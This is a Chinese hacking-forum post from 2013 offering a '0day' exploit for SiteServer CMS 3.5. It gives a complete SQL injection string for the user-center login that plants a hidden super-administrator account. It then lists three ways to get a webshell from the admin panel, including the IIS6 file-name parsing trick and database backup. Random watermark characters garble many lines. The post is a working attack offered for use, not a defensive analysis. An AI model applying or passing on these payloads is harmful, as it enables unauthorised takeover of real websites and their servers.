中国网络渗透测试联盟

标题: SiteServer CMS 0Day [打印本页]

---

作者: admin    时间: 2013-1-11 21:10
标题: SiteServer CMS 0Day
经测试秒杀最新的3.5版
- w1 ^# m# W2 l0 s$ _; `
stieserver官网:www.siteserver.cn

! `! |) A6 E6 M7 s1 n1 \

5 V  o) X' o) R4 D; \EXP:

5 S1 r% @  m7 M. V/ W& g直接访问UserCenter/login.aspx
2 j: h! h; r3 n# A/ H

6 W# N; c8 a" F3 N
/ n, h8 I9 G) @8 M" E/ c用户名处输入：

; {: n! h5 s8 s. V5 {+ r  `& v1 T123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
$ i$ B4 o. p/ r. |9 g
% r4 @5 F. W6 y3 |  m( p8 G

! L& p1 G% g5 N" y( t' N+ ]* N/ H, ?7 E密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。


2 H2 L9 M- n* A3 v
之后再访问后台SiteServer/login.aspx用插入的用户登陆
( g( `# E, A* P; _0 n6 c

2 s0 O* C5 F; z! w3 h  X
" E- ]1 B% ]7 T后台拿webshell的三种方法：

2 i: Y- b, G& H) y- g一、

% B8 K: Y$ ?) J* G8 r! s$ y站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

% [* v* r6 R( H9 x二、

成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
. e# @9 p& e, R) A- N6 t+ F. l
（ps：后台添加用户时不会验证是否含有非法字符）

% Z# ?$ G7 D3 \% \  d1 P( S三、
/ k% l( ]- C8 v# O- W% V
+ r) D5 Q6 ^* X+ g9 n7 \系统工具-》实用工具-》机器参数查看
- [: b1 W. d! P# \, E可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2